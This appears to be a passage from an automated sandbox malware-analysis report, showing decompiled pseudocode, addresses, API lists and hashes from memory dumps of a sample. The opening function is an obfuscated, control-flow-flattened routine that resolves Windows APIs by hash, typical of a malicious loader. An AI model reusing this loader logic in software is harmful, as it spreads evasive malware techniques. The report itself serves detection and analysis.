								_t139 =  *0x223dea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E02233E80(_t191, E02233F20(0xbb398380), 0x97f883e, _t278);
									 *0x223dea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x223e1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E02233E80(_t191, E02233F20(0xbb398380), 0x26c3f343, _t278);
									 *0x223e1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E02234250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E02232290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E02231C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E02232C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x022312b0
0x022312b8
0x022312c0
0x022312c2
0x022312c6
0x022312c8
0x022312cc
0x022312d0
0x022312d5
0x022312d9
0x022312dd
0x022312e1
0x022312e1
0x022312e1
0x022312e8
0x022312f0
0x022312f0
0x022312f0
0x022312f0
0x022312f5
0x00000000
0x00000000
0x022312fb
0x02231589
0x0223158e
0x02231590
0x022315a3
0x022315a8
0x022315a8
0x022315af
0x022315b1
0x022315b6
0x022315b8
0x022315cb
0x022315d0
0x022315d0
0x022315dc
0x022315de
0x022315e2
0x022315e7
0x00000000
0x02231301
0x02231301
0x02231306
0x0223148e
0x02231493
0x02231556
0x0223155b
0x00000000
0x02231561
0x02231569
0x0223156e
0x02231574
0x02231578
0x0223157f
0x00000000
0x0223157f
0x02231499
0x02231499
0x022314e6
0x022314fe
0x022314fe
0x022314ff
0x02231510
0x0223151d
0x02231523
0x02231528
0x0223152b
0x0223152e
0x02231531
0x02231534
0x02231534
0x02231534
0x02231537
0x0223153b
0x0223153b
0x0223153f
0x02231545
0x02231548
0x0223154d
0x00000000
0x0223149b
0x0223149b
0x022314a0
0x022314cb
0x022314d0
0x022314d4
0x022314d9
0x00000000
0x022314a2
0x022314a2
0x022314a7
0x02231879
0x0223187b
0x02231880
0x0223188e
0x00000000
0x00000000
0x00000000
0x022314a7
0x022314a0
0x02231499
0x0223130c
0x0223130c
0x02231452
0x02231457
0x02231459
0x0223146c
0x02231471
0x02231471
0x02231476
0x02231478
0x0223147c
0x02231480
0x02231484
0x00000000
0x02231312
0x02231312
0x02231317
0x02231414
0x02231419
0x00000000
0x0223141f
0x0223142f
0x02231434
0x02231438
0x0223143b
0x02231441
0x02231448
0x00000000
0x02231448
0x0223131d
0x0223131d
0x022313b5
0x022313b7
0x022313bc
0x022313be
0x022313d1
0x022313d6
0x022313d6
0x022313f6
0x022313f8
0x022313fd
0x02231402
0x02231406
0x0223140b
0x00000000
0x02231323
0x02231328
0x02231394
0x02231399
0x0223139d
0x022313a2
0x00000000
0x0223132a
0x0223132f
0x00000000
0x02231335
0x0223133b
0x02231343
0x02231345
0x02231349
0x02231353
0x0223135c
0x0223135d
0x02231364
0x02231369
0x0223136d
0x02231371
0x02231375
0x02231375
0x0223137a
0x0223137a
0x0223137e
0x02231382
0x02231387
0x00000000
0x02231387
0x0223132f
0x02231328
0x0223131d
0x02231317
0x0223130c
0x02231306
0x00000000
0x022312fb
0x022315f0
0x022315f5
0x0223174c
0x02231751
0x02231845
0x0223184d
0x02231855
0x02231859
0x0223185e
0x02231864
0x02231868
0x0223186f
0x00000000
0x02231757
0x02231757
0x0223175c
0x022317c0
0x022317c5
0x022317cb
0x022317cd
0x022317cf
0x022317e7
0x022317e9
0x022317e9
0x022317f5
0x02231813
0x02231815
0x0223181a
0x02231824
0x02231828
0x0223182c
0x02231837
0x0223183b
0x00000000
0x0223175e
0x0223175e
0x02231763
0x00000000
0x02231769
0x02231779
0x02231782
0x02231784
0x02231788
0x0223178a
0x00000000
0x02231790
0x02231795
0x02231796
0x0223179c
0x0223179e
0x022317a1
0x022317a5
0x022317a7
0x00000000
0x022317ad
0x022317ad
0x022317b1
0x00000000
0x022317b1
0x022317a7
0x0223178a
0x02231763
0x0223175c
0x022315fb
0x022315fb
0x022316e5
0x022316ea
0x022316ec
0x022316ff
0x02231704
0x02231704
0x0223170b
0x0223170d
0x02231712
0x02231714
0x02231727
0x0223172c
0x0223172c
0x02231738
0x0223173a
0x0223173e
0x02231743
0x00000000
0x02231601
0x02231601
0x02231606
0x022316bf
0x022316c4
0x00000000
0x022316ca
0x022316ce
0x022316d3
0x022316d7
0x022316dc
0x00000000
0x022316dc
0x0223160c
0x0223160c
0x0223169f
0x022316a4
0x022316aa
0x022316ae
0x022316b5
0x00000000
0x02231612
0x02231612
0x02231617
0x02231680
0x02231685
0x02231689
0x0223168e
0x00000000
0x02231619
0x02231619
0x0223161e
0x00000000
0x02231624
0x0223162c
0x02231631
0x02231639
0x02231641
0x02231649
0x02231651
0x02231656
0x0223165b
0x0223165f
0x02231662
0x02231668
0x0223166f
0x00000000
0x0223166f
0x0223161e
0x02231617
0x0223160c
0x02231606
0x022315fb
0x00000000
0x022314ad
0x022314ad
0x022314ad
0x022314c6
0x00000000
0x022314c6

Strings

a7a&, xrefs: 02231612
Ei, xrefs: 022313C0
Ei, xrefs: 022317D1
E?*, xrefs: 02231601
a7a&, xrefs: 02231548

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
Instruction ID: 75f249365da1273c7830dfa8a19f86c2169207a5f2f27f1327badec8b84f03a5
Opcode Fuzzy Hash: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
Instruction Fuzzy Hash: 3BE1BEB16243028BC71ADFE4D890A6BB3E6BBC4744F04491DE48ADB348DB74ED15CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00415F1B, Relevance: 10.6, APIs: 7, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00415F1B(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = E004126FB() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E0041668C(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E004126FB();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E00429977(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E0041668C(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E00416528(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x00415f2b
0x00415f2c
0x00415f2e
0x00415f32
0x00415f36
0x00415f48
0x00415f48
0x00415f4c
0x00415f4f
0x00415f55
0x00415f59
0x00415f6a
0x00000000
0x00415f6d
0x00415fe9
0x00415ffd
0x00415fff
0x00416007
0x00416014
0x0041601c
0x0041601e
0x0041601e
0x00416007
0x0041602b
0x00416069
0x00000000
0x0041602d
0x0041602d
0x00416034
0x0041603c
0x0041603e
0x00416046
0x00416046
0x00416057
0x00000000
0x00416059
0x00000000
0x00416059
0x00416057
0x0041602b
0x00000000
0x00416064
0x00415f86
0x00415f8c
0x00415f94
0x00415f96
0x00415f96
0x00415f9f
0x00415fba
0x00415fba
0x00415fc5
0x00415fe3
0x00415fe3
0x00000000
0x00415fc7
0x00415fcb
0x00415fe1
0x00000000
0x00000000
0x00000000
0x00415fe1
0x00415fc5
0x00415f38
0x00415f42
0x00415f46
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 00415F4F
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
UpdateWindow.USER32(?), ref: 00415F94
SendMessageA.USER32(?,00000121,00000000,?), ref: 00415FBA
SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00415FD9
UpdateWindow.USER32(?), ref: 0041601C
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004296EA, Relevance: 10.6, APIs: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				long _t45;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t41 = _t48->cx;
							if(_t41 >= 0x4000) {
								goto L6;
							}
							_t45 = _t39->cx;
							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
								_t41 = _t41 + _t41;
								_t48->cx = _t41;
								_t39->cx = _t45 + _t45;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t41 =  *(_t51 + 0x34);
							if(_t41 >= 0x4000) {
								goto L11;
							}
							_t43 =  *(_t51 + 0x3c);
							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t41;
								 *(_t51 + 0x3c) = _t43 + _t43;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E004297EF(_t51);
				}
				return _t26;
			}

0x004296ea
0x004296f0
0x004296f2
0x004296f9
0x00429701
0x00429707
0x0042970e
0x0042971b
0x0042971d
0x0042971d
0x00429725
0x00000000
0x00000000
0x00429727
0x0042972b
0x00429735
0x0042973b
0x0042973d
0x0042973f
0x00000000
0x00000000
0x0042973f
0x00000000
0x0042972b
0x0042971d
0x00429741
0x00429744
0x00429746
0x00429746
0x0042974f
0x00000000
0x00000000
0x00429751
0x00429756
0x00429760
0x00429766
0x00429769
0x0042976c
0x00000000
0x00000000
0x0042976c
0x00000000
0x00429756
0x00429746
0x0042976e
0x00429791
0x004297ae
0x004297b1
0x004297b2
0x004297b7
0x004297bc
0x004297cd
0x004297de
0x00000000
0x004297e6
0x004297ec

APIs

GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
GetDeviceCaps.GDI32(?,00000058), ref: 00429779
GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
SetMapMode.GDI32(00000000,00000008), ref: 004297BC
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF70, Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
GetMessageA.USER32 ref: 0041FF9B
DispatchMessageA.USER32 ref: 0041FFAE
SetRectEmpty.USER32(?), ref: 0041FFD7
GetDesktopWindow.USER32 ref: 0041FFEF
LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64

Uniqueness

Uniqueness Score: -1.00%

Function 004152C7, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

0x004152ce
0x004152d4
0x004152da
0x004152dd
0x004152e2
0x004152ee
0x00415301
0x0041530a
0x0041530c
0x00415314
0x0041531c
0x0041531e
0x00415321
0x00415323
0x00415326
0x0041532a
0x00000000
0x00415354
0x0041533c
0x00415342
0x00000000
0x00415342
0x0041531c
0x0041535e

APIs

GetParent.USER32(?), ref: 004152D4
GetWindowRect.USER32 ref: 004152EE
ScreenToClient.USER32 ref: 00415301
ScreenToClient.USER32 ref: 0041530A
EqualRect.USER32 ref: 00415314
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction ID: 07014e229ed6a7b25482b6998f11fd7e237ae46f5a3226271598de642c651d74
Opcode Fuzzy Hash: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction Fuzzy Hash: FB117F76600609FFE7109F68CC88EBBBBBDEB88710F108529B91593215E774AD418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425DE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425DE9(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x00425dff
0x00425e0b
0x00425e0e
0x00425e11
0x00425e14
0x00425e1f
0x00425e59
0x00425e59
0x00425e64
0x00425e69
0x00425e69
0x00425e6e
0x00425e73
0x00425e73
0x00425e7c

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73

Strings

software, xrefs: 00425E01

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction ID: 0af0f3997741b28716963c04c81515c15655377052ffcc376828dcfe476aa2da
Opcode Fuzzy Hash: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction Fuzzy Hash: 0311F872A00528FBCB21CB96DC84DEFFFBCEF89744F5000AAA515A2121D3705A01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E00404DD2() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x439618(_a4, _a8);
			}

0x00404f7a
0x00404f91
0x00404ff6
0x00000000
0x00404ff6
0x00404f93
0x00404f9a
0x00000000
0x00404fb3
0x00404fb4
0x00404fb7
0x00404fc5
0x00404fc8
0x00404fd0
0x00404fd1
0x00404fd2
0x00404fd8
0x00404fd9
0x00404fda
0x00404fdd
0x00404fe1
0x00404fec
0x00404fec
0x00000000
0x00404ff2
0x00404f9a
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
GetSystemMetrics.USER32 ref: 00404FC1
GetSystemMetrics.USER32 ref: 00404FC8
lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC

Strings

B, xrefs: 00404F8A
DISPLAY, xrefs: 00404FE6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction ID: 0269e9ff9c82b1da89f60d18f206ef68f762114564e5db41c1733f16ce370355
Opcode Fuzzy Hash: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction Fuzzy Hash: 0411C6B1600326ABDB119F649C8469BBFA8EF45750B508073FE05AE182D7B9D941CBF8

Uniqueness

Uniqueness Score: -1.00%

Function 0040381D, Relevance: 10.6, APIs: 7, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040381D(intOrPtr _a4) {
				long _v8;
				long _v12;
				struct tagMSG _v40;

				if(_a4 != 0) {
					_v8 = GetTickCount();
					while(1 != 0) {
						_v12 = GetTickCount();
						if(_v12 < _v8 || _v12 - _v8 > _a4) {
							break;
						} else {
							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
								Sleep(1);
							} else {
								GetMessageA( &_v40, 0, 0, 0);
								TranslateMessage( &_v40);
								DispatchMessageA( &_v40);
							}
							continue;
						}
					}
					return 1;
				}
				return 1;
			}

0x00403827
0x00403833
0x00403836
0x00403845
0x0040384e
0x00000000
0x0040385d
0x00403871
0x0040389b
0x00403873
0x0040387d
0x00403887
0x00403891
0x00403891
0x00000000
0x004038a1
0x0040384e
0x00000000
0x004038a3
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040382D
GetTickCount.KERNEL32 ref: 0040383F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

